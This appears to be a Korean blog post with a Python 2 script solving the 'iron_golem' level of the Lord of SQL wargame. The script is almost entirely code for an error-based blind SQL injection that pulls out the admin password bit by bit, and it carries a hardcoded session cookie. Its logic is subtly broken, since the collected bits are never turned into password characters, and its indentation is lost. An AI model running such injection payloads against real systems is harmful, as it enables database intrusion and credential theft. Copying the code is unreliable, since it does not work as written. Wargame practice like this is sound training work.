import urllib2
def request(data):
url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
response = urllib2.urlopen(req).read()
if "more than 1 row" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
binary = ""
for i in range(0,100):
payload = "' or id='admin' and if(length(pw)="+str(i)+",(select 1 union select 2),1)#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
binary = ""
for i in range(1,9):
payload = "' or id='admin' and if(substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1)=1,(select 1 union select 2),1)#"
if request(payload)==True:
binary += "1"
else:
binary += "0"
print "[-]Admin Password = " + admin_pw
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS hell_fire (0) | 2018.02.09 |
|---|---|
| LOS dark_eyes (0) | 2018.02.08 |
| LOS dragon (0) | 2018.02.08 |
| LOS xavis (0) | 2018.02.08 |
| LOS nightmare (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간